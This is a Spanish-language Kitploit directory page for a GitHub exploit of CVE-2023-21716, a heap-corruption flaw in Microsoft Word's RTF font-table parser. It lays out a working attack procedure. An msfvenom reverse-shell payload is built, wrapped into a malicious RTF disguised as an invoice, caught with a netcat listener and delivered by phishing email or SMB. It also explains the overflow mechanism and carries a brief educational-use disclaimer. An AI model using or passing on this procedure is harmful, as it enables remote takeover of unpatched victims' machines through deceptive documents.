Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-21716 — CVE-2023-21716 - Exploit de corrupción de montón RCE en fonttbl de RTF de Microsoft Word con payload de shell inversa | Kitploit
Herramientas/GitHubGitHub/reggyraider/cve-2023-21716
Herramientas de PhishingGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubreggyraider/cve-2023-21716

CVE-2023-21716

CVE-2023-21716 - Exploit de corrupción de montón RCE en fonttbl de RTF de Microsoft Word con payload de shell inversa

Ver Repositorio
25hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-21716 — Corrupción de montón en Microsoft Word RTF fonttbl RCE

Gravedad: Crítica (CVSS 9.8)
Afecta: Microsoft Word 2013 / 2016 / 2019 / 2021 (sin parche)
Parche: Microsoft Patch Tuesday de febrero de 2023
Autor: REGGYRAIDER


Resumen de la vulnerabilidad

CVE-2023-21716 es una vulnerabilidad de corrupción de montón en el analizador RTF de Microsoft Word (wwlib.dll).
Cuando Word analiza una directiva \fonttbl que contiene más de 32 767 entradas de fuente, un contador interno de 16 bits con signo se desborda, corrompiendo los metadatos del montón. Esto permite a un atacante lograr Ejecución Remota de Código simplemente enviando a la víctima un archivo .rtf manipulado.

Sin macros. Sin interacción del usuario más allá de abrir el archivo.


Configuración y Exploit

Paso 1 — Generar shellcode crudo con msfvenom

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin

Paso 2 — Clonar este repositorio

root@kitploit:~
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716

Paso 3 — Construir el RTF malicioso

root@kitploit:~
python3 exploit.py payload.bin invoice_march2024.rtf

Paso 4 — Iniciar su listener

root@kitploit:~
nc -lvnp 4444

Paso 5 — Entregar el archivo

Cargue vía SMB, archivo adjunto de correo electrónico, o cualquier vector de phishing.
Cuando la víctima abre invoice_march2024.rtf en un Word sin parche, usted recibe una shell reversa.


Cómo funciona

root@kitploit:~
Attacker creates RTF          Word parses \fonttbl        Heap corrupted
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl with 32769+         Signed 16-bit counter        Attacker's
font definitions             overflows → 0x8000           shellcode runs
  1. El exploit incrusta 32 769 definiciones de fuente \f<N> dentro de \fonttbl.
  2. Word asigna un búfer de tamaño fijo basado en el contador (ahora desbordado).
  3. Las escrituras de fuente posteriores van más allá del búfer asignado, corrompiendo fragmentos de montón adyacentes.
  4. El shellcode crudo (de payload.bin) se coloca dentro de \pict y cae en la región corrupta, obteniendo ejecución cuando el asignador lo procesa.

Descargo de responsabilidad

Esta herramienta está destinada únicamente con fines educativos y pruebas de penetración autorizadas.
Utilizar este exploit contra sistemas que no posee o para los que no tiene permiso explícito por escrito para probar es ilegal.
El autor no asume ninguna responsabilidad por el mal uso.


Referencias

  • Microsoft Security Advisory
  • NVD Entry
Descargar herramienta